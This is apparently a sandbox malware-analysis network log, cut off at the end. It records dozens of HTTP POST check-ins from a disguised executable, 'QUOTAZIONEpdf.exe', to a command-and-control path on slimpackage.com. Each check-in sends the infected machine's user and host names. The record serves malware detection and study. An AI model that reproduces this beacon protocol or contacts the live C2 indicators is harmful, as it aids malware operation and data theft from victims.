              Jan 14, 2022 09:52:43.349733114 CET1109OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:52:43.481673956 CET1109INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:42 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              30192.168.2.349806104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:32.376585007 CET1984OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:32.501925945 CET1985OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:32.632582903 CET1987INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:31 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              31192.168.2.349813104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:34.797107935 CET2000OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:34.921205997 CET2000OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:35.055516958 CET2000INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:33 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              32192.168.2.349814104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:38.518335104 CET2001OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:38.642458916 CET2001OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:38.778532028 CET2002INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:37 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              33192.168.2.349815104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:42.966613054 CET2003OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:43.102488041 CET2003OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:43.286082029 CET2005INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:42 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              34192.168.2.349821104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:50.386625051 CET9596OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:50.509305954 CET9596OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:50.642754078 CET9596INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:49 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              35192.168.2.349822104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:54.269267082 CET9597OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:54.395328999 CET9597OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:54.529158115 CET9598INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:53 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              36192.168.2.349824104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:57.036107063 CET10122OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:53:57.158740997 CET10273OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:53:57.289953947 CET10273INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:56 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              37192.168.2.349825104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:53:59.975080013 CET10274OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:00.099469900 CET10274OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:00.267862082 CET10274INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:53:59 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              38192.168.2.349826104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:02.086796045 CET10275OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:02.212654114 CET10275OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:02.343744040 CET10276INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:01 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              39192.168.2.349832104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:03.505878925 CET10288OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:03.630158901 CET10289OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:03.763714075 CET10292INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:02 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              4192.168.2.349746104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:52:44.662959099 CET1110OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:52:44.787275076 CET1110OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:52:44.925323009 CET1111INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:52:43 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              40192.168.2.349840104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:04.907351017 CET10305OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:05.030078888 CET10307OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:05.161437035 CET10309INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:04 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              41192.168.2.349852104.223.93.10580C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              TimestampkBytes transferredDirectionData
              Jan 14, 2022 09:54:07.608302116 CET10337OUTPOST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:07.732930899 CET10337OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:07.866544008 CET10338INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:06 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              42 | 192.168.2.3 | 49853 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:10.712951899 CET | 10338 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:10.835877895 CET | 10339 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:10.966197014 CET | 10339 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:09 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              43 | 192.168.2.3 | 49854 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:14.681171894 CET | 10340 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:14.805303097 CET | 10340 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:14.940711975 CET | 10340 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:13 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              44 | 192.168.2.3 | 49855 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:17.053160906 CET | 10341 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:17.180231094 CET | 10342 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:17.313810110 CET | 10342 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:16 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              45 | 192.168.2.3 | 49856 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:20.315522909 CET | 10343 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:20.439775944 CET | 10344 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:20.574155092 CET | 10344 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:19 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              46 | 192.168.2.3 | 49857 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:22.278675079 CET | 10345 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:22.414038897 CET | 10345 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:22.548707962 CET | 10345 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:21 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              47 | 192.168.2.3 | 49858 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:24.759273052 CET | 10346 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:24.883680105 CET | 10346 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:25.014372110 CET | 10347 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:23 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              48 | 192.168.2.3 | 49859 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:26.128942013 CET | 10347 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:26.256269932 CET | 10348 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:26.390346050 CET | 10348 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:25 GMT
              Server: Apache
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              49 | 192.168.2.3 | 49860 | 104.223.93.105 | 80 | C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 14, 2022 09:54:27.459033012 CET | 10349 | OUT | POST /slimmain/five/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: slimpackage.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: CC3B1AE
              Content-Length: 163
              Connection: close
              Jan 14, 2022 09:54:27.583146095 CET | 10349 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
              Data Ascii: (ckav.ruhardz910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
              Jan 14, 2022 09:54:27.717861891 CET | 10349 | IN | HTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 08:54:26 GMT
              Server: Apache
              Connection: close
